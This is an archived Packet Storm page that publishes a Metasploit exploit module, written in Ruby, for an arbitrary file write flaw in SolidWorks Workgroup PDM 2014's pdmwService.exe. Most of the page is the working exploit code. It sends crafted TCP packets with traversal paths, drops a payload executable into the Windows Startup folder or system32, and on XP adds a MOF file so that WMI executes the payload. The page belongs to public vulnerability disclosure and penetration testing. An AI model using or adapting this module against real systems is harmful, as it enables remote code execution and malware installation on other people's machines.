exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write

SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write
Posted Mar 6, 2014
Authored by Brendan Coles, Mohamed Shetta | Site metasploit.com

This Metasploit module exploits a remote arbitrary file write vulnerability in SolidWorks Workgroup PDM 2014 SP2 and prior. For targets running Windows Vista or newer the payload is written to the startup folder for all users and executed upon next user logon. For targets before Windows Vista code execution can be achieved by first uploading the payload as an exe file, and then upload another mof file, which schedules WMI to execute the uploaded payload. This Metasploit module has been tested successfully on SolidWorks Workgroup PDM 2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).

tags | exploit, remote, arbitrary, code execution
systems | windows
SHA-256 | 555ceedf2a25fd70fef94c9ae70c8626ff642d286be5b686e2bf20bc82d0820a

SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(
info,
'Name' => 'SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write',
'Description' => %q{
This module exploits a remote arbitrary file write vulnerability in
SolidWorks Workgroup PDM 2014 SP2 and prior.

For targets running Windows Vista or newer the payload is written to the
startup folder for all users and executed upon next user logon.

For targets before Windows Vista code execution can be achieved by first
uploading the payload as an exe file, and then upload another mof file,
which schedules WMI to execute the uploaded payload.

This module has been tested successfully on SolidWorks Workgroup PDM
2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mohamed Shetta <mshetta[at]live.com>', # Initial discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
],
'References' =>
[
['EDB', '31831'],
['OSVDB', '103671']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Platform' => 'win',
'Targets' =>
[
# Tested on:
# - SolidWorks Workgroup PDM 2011 SP0 (Windows XP SP3 - EN)
# - SolidWorks Workgroup PDM 2011 SP0 (Windows 7 SP1 - EN)
['Automatic', { 'auto' => true } ], # both
['SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)', {}],
['SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)', {}],
],
'Privileged' => true,
'DisclosureDate' => 'Feb 22 2014',
'DefaultTarget' => 0))

register_options([
OptInt.new('DEPTH', [true, 'Traversal depth', 10]),
Opt::RPORT(30000)
], self.class)
end

def peer
"#{rhost}:#{rport}"
end

#
# Check
#
def check
# op code
req = "\xD0\x07\x00\x00"
# filename length
req << "\x00\x00\x00\x00"
# data length
req << "\x00\x00\x00\x00"
connect
sock.put req
res = sock.get_once
disconnect
if !res
vprint_error "#{peer} - Connection failed."
Exploit::CheckCode::Unknown
elsif res == "\x00\x00\x00\x00"
vprint_status "#{peer} - Received reply (#{res.length} bytes)"
Exploit::CheckCode::Detected
else
vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
Exploit::CheckCode::Safe
end
end

#
# Send a file
#
def upload(fname, data)
# every character in the filename must be followed by 0x00
fname = fname.scan(/./).join("\x00") + "\x00"
# op code
req = "\xD0\x07\x00\x00"
# filename length
req << "#{[fname.length].pack('l')}"
# file name
req << "#{fname}"
# data length
req << "#{[data.length].pack('l')}"
# data
req << "#{data}"
connect
sock.put req
res = sock.get_once
disconnect
if !res
fail_with(Failure::Unknown, "#{peer} - Connection failed.")
elsif res == "\x00\x00\x00\x00"
print_status "#{peer} - Received reply (#{res.length} bytes)"
else
print_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
end
end

#
# Exploit
#
def exploit
depth = '..\\' * datastore['DEPTH']
exe = generate_payload_exe
exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe"
if target.name =~ /Automatic/ or target.name =~ /Vista/
print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)")
upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe)
end
if target.name =~ /Automatic/ or target.name =~ /XP/
print_status("#{peer} - Sending EXE (#{exe.length} bytes)")
upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe)
mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof"
mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
print_status("#{peer} - Sending MOF (#{mof.length} bytes)")
upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
end
register_file_for_cleanup("#{::File.basename(exe_name)}")
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close